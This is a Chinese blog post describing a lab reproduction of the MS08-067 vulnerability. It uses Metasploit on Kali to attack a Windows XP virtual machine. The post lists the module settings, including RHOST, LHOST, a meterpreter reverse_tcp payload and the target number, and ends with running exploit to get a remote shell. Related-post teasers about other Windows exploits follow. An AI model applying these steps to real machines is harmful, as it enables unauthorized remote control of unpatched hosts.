kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

已于 2022-09-16 22:36:18 修改
阅读量5.9k 收藏 49
点赞数 4
分类专栏: # 漏洞复现 文章标签: 安全
于 2021-05-16 17:15:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/116896715
版权

kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

漏洞简介

MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

实验环境:


工具:metasploit

靶机两台:windows xp2和kali2020

攻击机的IP(kali):192.168.29.133

靶机IP(xp2):  192.168.29.134

实验条件:两台机子可以互通的,并且windows xp2需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。

步骤:

1)在kali终端输入msfconsole,启动Metasploit工具

2)输入命令search   ms08_067,查找关于ms08_067的漏洞模块。

3)输入如下命令,使用该漏洞模块

4进入这个模块后,show options 查看该模块需要配置的参数

5)设置配置项(show options)

设置靶机IP(xp2set RHOST 192.168.29.134

设置要执行的payload: set payload windows/meterpreter/reverse_tcp

设置攻击机的IP(kali):set LHOST 192.168.29.133

设置要攻击的目标操作系统类型:set target 34

用show options查看相关参数是否配置正确

6)最后,输入exploit,回车运行,进入到特殊的payload---meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置。

zxl2605
关注
专栏目录
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 1828
小白学Kali?机会来了!
KaliMSFMS08-067漏洞复现详解
weixin_47899104的博客
12-05 7406
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kalikali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5714
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
基于kali Linux的msfconsole在线安装和使用
最新发布
2302_80252080的博客
07-28 417
Msf, 全称Metasploit Framework,是一个广泛使用的开源渗透测试框架。它主要用于网络安全评估和漏洞利用,旨在帮助安全专业人员发现并利用系统中的安全漏洞Msf包含了一系列工具,如exploits(漏洞利用模块)、auxiliary modules(辅助功能,比如信息收集)、payloads(攻击载荷)以及post-exploitation modules( exploitation后的操作),以便在找到漏洞后完成整个攻击链。
MSF初体验 - kali linux 入侵XP系统
weixin_30707875的博客
06-12 612
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D...
kail利用msf工具对ms10-087漏洞入侵渗透WinXP
qq_50854662的博客
05-27 1972
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和MS10-087相关的模块search ms10_087 3,使用exploit/windows/fileformat/ms10_087_rtf_pfragments_bof模块 use exploit/windows/fileformat/ms10_087_rtf_pfragments_
使用MSF 利用 ms08_067XP 进行渗透
枫梓林のBlog
04-21 2265
利用 ms08_067XP 进行渗透 文章目录利用 ms08_067XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 Metasploit 对 XP 进行渗透三、总结 一、项目要求 渗透到 XP系统系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统漏洞,进行复
利用win系统ms08-067漏洞.docx
10-26
利用Win系统MS08-067漏洞 MS08-067漏洞Windows操作系统中一个严重的漏洞,它允许攻击者在无需身份验证的情况下远程执行代码。该漏洞于2008年10月โดยMicrosoft发布了补丁,但直到现在仍然有很多系统没有打补丁...
最详细利用kalimsf进行CVE-2019-0708漏洞复现
热门推荐
qq_43331608的博客
10-03 1万+
CVE-2019-0708 技术无罪,请勿用于恶意用途,出事本人不负一切责任 0.漏洞背景 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类...
使用Nmap漏扫+Metasploit渗透测试框架,利用MS08-067漏洞渗透
george1898的博客
12-25 1165
本期框架介绍:Metasploit是一一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口中、选项、变量和模块所震撼,而感觉无所适从。下面我们将应用一个安全来熟透认知、一起来探讨它的微妙吧!
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1798
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统攻击者可以利用漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
ms08_067补丁,windowsxp补丁
04-26
ms08067补丁,最近的好多病毒、木马,打过这个补丁后就可以杀了。比如:jwgkvsq.vmx
445端口攻击详解/教学
03-22
445端口攻击 详解/教学 仅供教学。 后果自承,私人收藏
135端口的入侵入侵过程中常见的情况
10-16
135端口的入侵相关问题 很好的一个135端口入侵解析,希望朋友们多多支持!
LINUX KALI初级渗透XP系统入门学习总结(一)
Taneeyo的博客
02-11 1348
LINUX KALI在 Metasploit框架下初级渗透XP系统入门学习总结(一) Metasploit的辅助模块主要用于信息搜集阶段,功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、实施网络协议欺骗等。这些模块可以分为Admin、Scanner、Server三个大类 第一步 安装好kali以及更新msf模块 更新你的msf框架 root@kali:~# apt-get update...
MSF完成对win7;xp漏洞攻击
qq_61988806的博客
01-03 794
msf渗透win7 winxp(持续更新)
kali使用msf渗透测试靶机
qq_53175607的博客
11-18 1254
kali利用metasploit使用ms17-010(永恒之蓝)渗透靶机windones7 免责声明:只用于靶机测试 1.渗透之前要关闭windones7和主机的防火墙及杀毒软件。 2.使用nmap扫描windones7 3.445端口开放,说明有ms17-010的漏洞。 4.使用命令msfconsole打开msf 5.使用search ms17-010命令查找攻击模块 6.使用exploit/windows/smb/ms17_010_eternalblue模块攻击 use选择 7.show options
学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机
weixin_50888597的博客
09-29 2722
kali学习之用虚拟机创建win7系统msf工具攻击
通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作
weixin_60182338的博客
03-17 2937
渗透测试仅用于个人的学习以提升能力,不能用于非法的恶意攻击
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值